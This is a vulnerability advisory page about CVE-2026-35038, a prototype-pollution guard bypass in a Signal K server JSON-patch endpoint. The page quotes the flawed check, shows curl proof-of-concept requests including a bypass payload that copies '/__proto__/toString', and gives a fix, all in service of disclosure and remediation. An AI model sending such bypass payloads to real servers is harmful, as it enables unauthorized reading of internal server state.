Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-35038 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
The /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /proto/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.
While this does not allow arbitrary code execution (as the destination path remains protected from proto), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.
File: src/interfaces/applicationData.js (Lines 48-57)
const DANGEROUS_PATH_SEGMENTS = ['__proto__', 'constructor', 'prototype']
function isPrototypePollutionPath(pathString) {
const segments = pathString.split(/[./]/)
return segments.some((seg) => DANGEROUS_PATH_SEGMENTS.includes(seg))
}
function hasPrototypePollutionPatch(patches) {
return patches.some(
// [!VULNERABLE] Only checks patch.path, completely ignores patch.from
(patch) => patch.path && isPrototypePollutionPath(patch.path)
)
}
At Line 201:
if (hasPrototypePollutionPatch(req.body)) {
res.status(400).send('invalid patch path')
return
}
jsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves 'from'
Verify the Developer Guard Works (The Blocked Payload):
curl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '[{"op": "add", "path": "/__proto__/polluted", "value": "hacked"}]'
Result: 400 Bad Request - invalid patch path
Execute the Bypass (The Malicious Payload):
curl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '[{"op": "copy", "from": "/__proto__/toString", "path": "/stolen"}]'
Result: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the proto internal function reference.
<img width="1222" height="230" alt="Screenshot 2026-03-24 150440" src="https://github.com/user-attachments/assets/5ae580fd-284f-4bef-adc8-31b50b8751b6" />This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.
The hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:
function hasPrototypePollutionPatch(patches) {
return patches.some(
(patch) =>
(patch.path && isPrototypePollutionPath(patch.path)) ||
(patch.from && isPrototypePollutionPath(patch.from))
)
}
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.